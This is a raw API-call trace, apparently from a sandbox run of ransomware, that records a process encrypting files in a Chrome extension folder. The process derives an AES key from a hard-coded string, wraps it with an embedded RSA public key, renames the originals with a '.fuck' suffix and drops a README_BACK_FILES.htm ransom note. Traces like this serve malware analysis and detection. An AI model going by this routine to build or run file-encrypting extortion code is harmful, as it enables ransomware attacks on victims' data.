hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.519] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.519] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.519] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.519] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.519] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.519] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.519] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.519] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.519] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.519] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.520] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.520] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.520] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.520] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.520] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.520] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.520] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.520] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.520] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.520] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.520] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.520] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.520] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.520] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.520] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.520] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.520] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.520] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.521] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.521] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.521] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.521] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.521] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.521] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.521] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.521] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.521] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.521] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.521] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.521] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.521] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.521] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.521] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.522] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js"), bFailIfExists=0) returned 1 [0258.592] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js", dwFileAttributes=0x0) returned 1 [0258.593] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js.gsg")) returned 1 [0258.595] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js.fuck")) returned 1 [0258.597] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0258.597] CryptDestroyKey (hKey=0x2e7fd40) returned 1 [0258.597] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0258.597] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0258.597] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\*.*", lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0x2e7fc00 [0258.598] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0258.598] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0258.598] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cff4 | out: lpSystemTimeAsFileTime=0x2b9cff4) [0258.598] GetLastError () returned 0x0 [0258.598] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css")) returned 0x20 [0258.598] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css", dwFileAttributes=0x80) returned 1 [0258.599] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0258.599] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0258.600] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css.gsg", dwFileAttributes=0x2) returned 1 [0258.600] CryptAcquireContextA (in: phProv=0x2b9bff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bff0*=0x2e7bf90) returned 1 [0258.603] CryptCreateHash (in: hProv=0x2e7bf90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bff4 | out: phHash=0x2b9bff4) returned 1 [0258.603] lstrlenA (lpString="WcJIVquNvpAEukoBQHzQwvMnzMlQm") returned 29 [0258.603] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0258.603] CryptDeriveKey (in: hProv=0x2e7bf90, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bfe0 | out: phKey=0x2b9bfe0*=0x2e7c200) returned 1 [0258.603] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----c", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0258.603] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bffc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8 | out: pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8) returned 1 [0258.603] CryptAcquireContextA (in: phProv=0x2b9bfec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bfec*=0x2e7bbd8) returned 1 [0258.603] CryptImportPublicKeyInfo (in: hCryptProv=0x2e7bbd8, dwCertEncodingType=0x1, pInfo=0x2e273f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e27420*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e27428*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bfe4 | out: phKey=0x2b9bfe4*=0x2e7c340) returned 1 [0258.603] CryptEncrypt (in: hKey=0x2e7c340, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x80) returned 1 [0258.603] CryptEncrypt (in: hKey=0x2e7c340, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e7b578*, pdwDataLen=0x2b9bfe8*=0x18, dwBufLen=0x80 | out: pbData=0x2e7b578*, pdwDataLen=0x2b9bfe8*=0x80) returned 1 [0258.604] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e7b578*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x2e7b578*, lpNumberOfBytesWritten=0x2b9bff8*=0x80, lpOverlapped=0x0) returned 1 [0258.605] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.617] CryptEncrypt (in: hKey=0x2e7c200, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.617] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.636] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x34d, lpOverlapped=0x0) returned 1 [0258.636] CryptEncrypt (in: hKey=0x2e7c200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x34d, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x350) returned 1 [0258.636] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x350, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x350, lpOverlapped=0x0) returned 1 [0258.636] CloseHandle (hObject=0x5d50) returned 1 [0258.636] CloseHandle (hObject=0x5d60) returned 1 [0258.636] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css"), bFailIfExists=0) returned 1 [0258.639] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css", dwFileAttributes=0x0) returned 1 [0258.640] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css.gsg")) returned 1 [0258.641] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css.fuck")) returned 1 [0258.642] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0258.642] CryptDestroyKey (hKey=0x2e7c200) returned 1 [0258.642] CryptReleaseContext (hProv=0x2e7bf90, dwFlags=0x0) returned 1 [0258.642] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0 [0258.642] FindClose (in: hFindFile=0x2e7fc00 | out: hFindFile=0x2e7fc00) returned 1 [0258.642] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\readme_back_files.htm")) returned 0xffffffff [0258.642] AreFileApisANSI () returned 1 [0258.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3af0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 149 [0258.642] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d268, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0258.643] GetFileType (hFile=0x5d64) returned 0x1 [0258.643] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9beb4*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9beac, lpOverlapped=0x0 | out: lpBuffer=0x2b9beb4*, lpNumberOfBytesWritten=0x2b9beac*=0x5ec, lpOverlapped=0x0) returned 1 [0258.644] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0258.644] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\*.*", lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0x2e7fd40 [0258.644] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0258.644] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0258.645] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cff4 | out: 